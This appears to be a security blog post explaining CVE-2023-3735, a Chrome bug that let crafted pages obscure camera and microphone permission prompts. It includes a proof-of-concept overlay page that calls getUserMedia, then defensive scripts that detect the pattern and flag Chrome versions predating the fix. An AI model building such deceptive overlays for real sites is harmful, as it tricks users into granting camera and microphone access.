When it comes to online security, what you see really does matter. Chrome tries to warn you and put decisions in your hands, but what happens if a web page can trick the browser into hiding those warnings? Today we'll explore CVE-2023-3735, a vulnerability in Google Chrome that let a crafted HTML page obscure permission prompts (the security UI that asks you to allow camera, microphone or similar access) so that users were less likely to notice or understand them.

Let's break it down in simple terms, look at the exploit, and see how it was fixed.

The Issue: *Security Prompts in Disguise*

Permission prompts, like “Allow this site to use your camera?”, are standard in Chrome. They are browser UI, drawn by Chrome itself rather than by the page, so the user can trust that what they see is the real request and can tell which origin is asking. But in Chrome versions before 115.0.5790.98, an inappropriate implementation in the Web API permission prompts meant a crafted HTML page could cause these prompts to be shown in a way that was hidden, displaced or disguised. The technical term for this class of bug is security UI obfuscation.

In practice this meant you might not see, or might misread, a request for microphone, camera or other sensitive access, and could grant it without realising.

How the Exploit Works

Here’s a walk-through in HTML and JavaScript of how an attacker would approach the vulnerability, based on what was reported:

Step 1: Create a deceptive HTML page

The attacker builds a page that positions a full-viewport overlay (or embeds content in an iframe) to cover or distract from the area where the permission prompt appears, and then triggers a permission request. Note that in a correctly behaving browser the permission bubble is drawn as browser UI, not as part of the web content, so page CSS cannot normally paint over it; the bug was that Chrome could be made to present the prompt in a way that a crafted page could obscure.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Fake Content</title>
    <style>
      /* Full-viewport, near-opaque layer stacked above everything else in
         the page. This is what the attacker uses to cover or distract from
         the area where the permission prompt appears. */
      .cover {
        position: fixed;
        top: 0; left: 0;
        right: 0; bottom: 0;
        background: white;
        z-index: 99999;
        opacity: 0.98;
      }
    </style>
  </head>
  <body>
    <h2>Watch this funny video!</h2>
    <div class="cover"></div>
    <script>
      // Trigger the camera/microphone permission prompt while the overlay
      // is in place and the user's attention is on the fake content.
      navigator.mediaDevices.getUserMedia({video: true, audio: true})
        .then(stream => {
          // Permission granted: the attacker now holds a live media stream
        })
        .catch(err => {
          // Permission denied or no device available; do nothing
        });
    </script>
  </body>
</html>

In this snippet:

- The .cover div is a fixed-position, near-opaque layer with a very high z-index, anchored to all four edges of the viewport, so it blocks the user's view of whatever lies beneath it in the web content area, partly or fully.
- The script then requests camera and microphone access, which makes Chrome show the permission prompt while the user believes they are looking at a harmless page.

Step 2: The User is Fooled

The permission prompt is now partially or fully hidden, or blends into the page's own content. The user might click “Allow” thinking they’re dismissing a newsletter signup or cookie notice, when really they’re giving the site access to their camera or microphone.
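The following is an added example, not code from the original post or from Chromium: a heuristic static scan, runnable in Node.js, that looks through a page's inline <style> rules for the pattern the snippet above uses (a position: fixed layer anchored to every edge of the viewport with a very high z-index) and checks whether the same page also calls a permission-requesting API. The z-index threshold of 1000, the list of API names and the two sample pages are assumptions constructed for this example.

```javascript
// Added example (not from the original post or from Chromium). Heuristic
// static scan of an HTML document: does it define a full-viewport fixed
// overlay with a very high z-index AND call a permission-requesting Web API?
// Thresholds and the API list are assumptions chosen for this illustration.

// Substrings that indicate a permission prompt will be requested.
const PERMISSION_APIS = [
  'getUserMedia',
  'geolocation.getCurrentPosition',
  'geolocation.watchPosition',
  'Notification.requestPermission',
];

// Strip CSS comments and split "selector { declarations }" blocks into
// objects. Rules nested in @media blocks are found with their inner selector;
// the media condition itself is ignored.
function parseCssRules(css) {
  const rules = [];
  const cleaned = css.replace(/\/\*[\s\S]*?\*\//g, '');
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(cleaned)) !== null) {
    const decls = {};
    for (const part of m[2].split(';')) {
      const idx = part.indexOf(':');
      if (idx === -1) continue;
      const prop = part.slice(0, idx).trim().toLowerCase();
      const value = part.slice(idx + 1).trim().toLowerCase();
      if (prop) decls[prop] = value;
    }
    rules.push({ selector: m[1].trim(), decls });
  }
  return rules;
}

// A zero length in any unit (CSS also allows a bare "0").
function isZero(v) {
  return v !== undefined && /^0(px|%|em|rem|vw|vh)?$/.test(v);
}

// True if the declarations pin the element to the whole viewport.
function coversViewport(d) {
  const edges = ['top', 'left', 'right', 'bottom'].every(e => isZero(d[e]));
  const inset = isZero(d.inset);
  const sized = /^100(vw|%)$/.test(d.width || '') && /^100(vh|%)$/.test(d.height || '');
  return edges || inset || sized;
}

// Return the rules that build a suspicious overlay: position: fixed, covering
// the viewport, stacked at or above zIndexThreshold (assumed 1000).
function findOverlayRules(css, zIndexThreshold = 1000) {
  return parseCssRules(css)
    .filter(r => r.decls.position === 'fixed' && coversViewport(r.decls))
    .filter(r => parseInt(r.decls['z-index'] || '0', 10) >= zIndexThreshold)
    .map(r => ({
      selector: r.selector,
      zIndex: parseInt(r.decls['z-index'], 10),
      // opacity defaults to 1; a value near 1 hides what is beneath it, a value
      // near 0 is the transparent click-stealing variant of the same trick
      opacity: r.decls.opacity === undefined ? 1 : parseFloat(r.decls.opacity),
    }));
}

// Scan a whole HTML document: collect inline <style> blocks, look for overlay
// rules, and check whether a permission-requesting API is referenced anywhere.
function scanPage(html) {
  const styles = [];
  const styleRe = /<style[^>]*>([\s\S]*?)<\/style>/gi;
  let m;
  while ((m = styleRe.exec(html)) !== null) styles.push(m[1]);
  const overlays = styles.flatMap(css => findOverlayRules(css));
  const permissionApis = PERMISSION_APIS.filter(api => html.includes(api));
  return { overlays, permissionApis, suspicious: overlays.length > 0 && permissionApis.length > 0 };
}

// Constructed sample inputs: a page shaped like the snippet above, and a
// benign page with an ordinary sticky header that must not be flagged.
const SUSPICIOUS_PAGE = `<!DOCTYPE html><html><head><title>Fake Content</title>
<style>
  .cover { position: fixed; top: 0; left: 0; right: 0; bottom: 0;
           background: white; z-index: 99999; opacity: 0.98; }
</style></head><body><h2>Watch this funny video!</h2><div class="cover"></div>
<script>navigator.mediaDevices.getUserMedia({video: true, audio: true});</script>
</body></html>`;

const BENIGN_PAGE = `<!DOCTYPE html><html><head>
<style> header { position: fixed; top: 0; left: 0; right: 0; height: 48px; z-index: 10; } </style>
</head><body><header>Site</header><p>Nothing to see here.</p></body></html>`;

console.log(JSON.stringify(scanPage(SUSPICIOUS_PAGE), null, 2));
console.log(JSON.stringify(scanPage(BENIGN_PAGE), null, 2));
```

A scan like this only flags the intent pattern; it cannot tell whether Chrome's UI was actually obscured, which depends on the browser version, and a legitimate modal dialog or cookie banner will match the overlay rule too. Treat hits as triage leads, not verdicts.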

References

- Chromium Issue 1464075 (Monorail) – Technical discussion and patch.
- Chromium Release Notes (115.0.5790.98)
- NVD CVE-2023-3735 Record

Severity and Fix

Google rated this vulnerability as Medium severity (Chromium security severity: Medium). Why? On its own it doesn't give an attacker code execution or direct access to your machine; the risk is that it tricks you into clicking “Allow” on something you would normally refuse.

The fix? Chrome 115.0.5790.98 corrected the permission prompt implementation so that a crafted page can no longer cover or disguise the prompt with layered HTML; the change itself is tracked in the Chromium bug listed above. This is a clickjacking-style attack (on mobile the same idea is called tapjacking): the victim sees one thing and clicks on another.
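As an added example (not from the original post), here is a small Node.js check that a fleet or web-log reviewer could use to tell whether a reported Chrome version predates the fix. The fixed version 115.0.5790.98 is the one named in the Chrome 115 stable release; the User-Agent strings in the sample are constructed. It also handles the edge case that modern Chrome sends a reduced User-Agent (the minor, build and patch fields are frozen at 0.0.0), so a UA alone can only settle the question when the major version differs from 115.

```javascript
// Added example (not from the original post). Decide from a Chrome version
// string, taken from a User-Agent header or chrome://version, whether the
// build predates the release that fixed CVE-2023-3735. Sample UA strings
// below are constructed for illustration.

const FIXED_VERSION = '115.0.5790.98';

// Parse "major.minor.build.patch" into four numbers; reject anything else.
function parseVersion(s) {
  const m = /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/.exec(s.trim());
  if (!m) throw new Error(`not a four-part Chrome version: ${s}`);
  return m.slice(1, 5).map(Number);
}

// Numeric, component-wise comparison (a plain string comparison would rank
// "99" above "115"). Returns -1, 0 or 1.
function compareVersions(a, b) {
  const va = parseVersion(a), vb = parseVersion(b);
  for (let i = 0; i < 4; i++) {
    if (va[i] !== vb[i]) return va[i] < vb[i] ? -1 : 1;
  }
  return 0;
}

// Extract the Chrome version token from a User-Agent string, or null if the
// browser is not Chromium-based. Other Chromium embedders (e.g. Edge) carry
// the same token but ship fixes on their own schedule, so treat their
// result as a hint only.
function chromeVersionFromUserAgent(ua) {
  const m = /Chrome\/(\d+\.\d+\.\d+\.\d+)/.exec(ua);
  return m ? m[1] : null;
}

function isVulnerableVersion(version) {
  return compareVersions(version, FIXED_VERSION) < 0;
}

// Classify a UA as 'vulnerable', 'patched', 'indeterminate' or 'unknown'.
// Chrome 101+ sends a reduced UA such as "Chrome/115.0.0.0": only the major
// is real, so within the fix's own major the patch level cannot be known.
function classifyUserAgent(ua) {
  const v = chromeVersionFromUserAgent(ua);
  if (!v) return 'unknown';
  const [major, minor, build, patch] = parseVersion(v);
  const [fixedMajor] = parseVersion(FIXED_VERSION);
  if (minor === 0 && build === 0 && patch === 0) {
    if (major < fixedMajor) return 'vulnerable';
    if (major > fixedMajor) return 'patched';
    return 'indeterminate';
  }
  return isVulnerableVersion(v) ? 'vulnerable' : 'patched';
}

// Constructed sample: one full-version UA, one reduced UA, one non-Chrome UA.
const SAMPLE_UAS = [
  'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36',
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36',
  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15',
];

for (const ua of SAMPLE_UAS) {
  console.log(`${classifyUserAgent(ua).padEnd(13)} ${chromeVersionFromUserAgent(ua) || '-'}`);
}
```

For an authoritative answer on a managed fleet, read the installed version from the client (chrome://version or the browser's management reporting) rather than from the User-Agent, which the reduction policy deliberately makes uninformative.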

Conclusion

CVE-2023-3735 is a good example of how even major browsers have to watch out for small tricks. With nothing more than a crafted HTML page, an attacker could make permission prompts hard to see or recognise, and users could grant access they never meant to. It is a reminder that good security relies not just on code, but on making sure users can *see* and *understand* what’s going on.

Stay updated, stay alert!

*If you're a coder or researcher, always check the latest release notes and Chromium's security blog. Find the details in the references above to dig deeper!*

Timeline

Published on: 08/01/2023 23:15:00 UTC
Last modified on: 08/12/2023 06:18:00 UTC